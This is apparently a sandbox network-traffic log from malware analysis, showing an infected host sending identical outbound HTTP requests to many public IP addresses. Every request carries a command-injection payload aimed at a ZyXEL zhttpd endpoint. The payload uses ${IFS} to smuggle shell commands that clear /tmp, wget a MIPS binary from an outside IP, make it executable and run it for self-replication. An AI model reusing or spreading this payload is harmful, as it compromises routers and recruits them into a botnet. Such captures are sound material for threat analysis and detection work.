                                                        Feb 2, 2024 06:21:20.130227089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6835192.168.2.1443736165.56.245.214443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.130283117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6836192.168.2.1446334150.177.23.87443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.130337954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6837192.168.2.144143668.103.80.149443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.130376101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6838192.168.2.143786845.250.213.96443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.130414009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6839192.168.2.143573853.251.9.136443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.130453110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6840192.168.2.1436492109.231.96.95443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.130498886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6841192.168.2.14433828.31.147.46443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.130549908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6842192.168.2.1438576183.153.238.215443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.130594969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6843192.168.2.1444612166.193.63.39443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.130616903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6844192.168.2.1448696150.239.89.253443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.130667925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6845192.168.2.1443420120.159.40.243443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.130712986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6846192.168.2.1441854126.53.7.6443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.130744934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6847192.168.2.145296812.65.104.129443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.130805016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6848192.168.2.144700657.120.105.55443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.130892992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6849192.168.2.1459922179.71.164.26443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.130922079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6850192.168.2.1447072132.135.27.184443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.130974054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6851192.168.2.1457314213.181.37.156443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.131017923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6852192.168.2.146047048.160.143.187443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.131048918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6853192.168.2.1440606189.76.124.117443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.131088972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6854192.168.2.1439984111.33.220.179443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.131134987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6855192.168.2.145418475.18.58.16443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.131181955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6856192.168.2.145499820.255.235.20443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.131210089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6857192.168.2.1433142103.117.127.169443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.131268978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6858192.168.2.143852091.68.33.203443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.131295919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6859192.168.2.1433294217.138.252.130443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.131315947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6860192.168.2.1456384188.217.177.113443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.131371975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6861192.168.2.145836697.109.104.200443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.131401062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6862192.168.2.1443800185.184.155.108443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.131454945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6863192.168.2.1460784189.189.232.158443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.131479979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6864192.168.2.146096069.85.116.160443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.131509066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6865192.168.2.1442390180.100.88.7443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.131561995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6866192.168.2.1451444223.112.156.67443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.131604910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6867192.168.2.1455892202.48.137.187443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.131666899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6868192.168.2.1459316194.68.137.112443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.131702900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6869192.168.2.143405457.243.206.86443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.131762028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6870192.168.2.144016286.43.97.25443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.131791115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6871192.168.2.1456232105.223.238.229443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.131838083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6872192.168.2.1442222125.89.107.63443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.131869078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6873192.168.2.143905424.243.13.72443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.131895065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6874192.168.2.1440824163.18.108.129443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.131934881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6875192.168.2.145230019.36.186.145443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.131975889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6876192.168.2.1448958139.77.112.36443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.132009029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6877192.168.2.1442940222.15.79.233443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.132049084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6878192.168.2.1444706181.100.161.178443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.132111073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6879192.168.2.1460580218.58.14.78443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.132143974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6880192.168.2.1452728145.10.232.34443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.132184982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6881192.168.2.145606857.141.163.187443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.132209063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6882192.168.2.1448202134.85.178.123443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.132258892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6883192.168.2.1449630208.39.114.207443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.132297993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6884192.168.2.1438304200.254.84.250443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.132320881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6885192.168.2.1448110117.31.229.138443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.132366896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6886192.168.2.144111236.121.24.196443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.132402897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6887192.168.2.1457960120.206.237.30443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.132450104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6888192.168.2.1446100193.124.254.133443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.132473946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6889192.168.2.1459768156.42.203.47443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.132514954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6890192.168.2.1439448145.216.10.225443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.132550955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6891192.168.2.144086476.175.251.227443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.132601976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6892192.168.2.1458480141.175.87.140443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.132639885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6893192.168.2.1459092129.133.235.65443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.132683992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6894192.168.2.1456008200.17.33.146443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.132710934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6895192.168.2.1438954177.18.96.195443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.132749081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6896192.168.2.145816074.123.253.115443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.132805109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6897192.168.2.144918673.123.74.203443
                                                        TimestampBytes transferredDirectionData
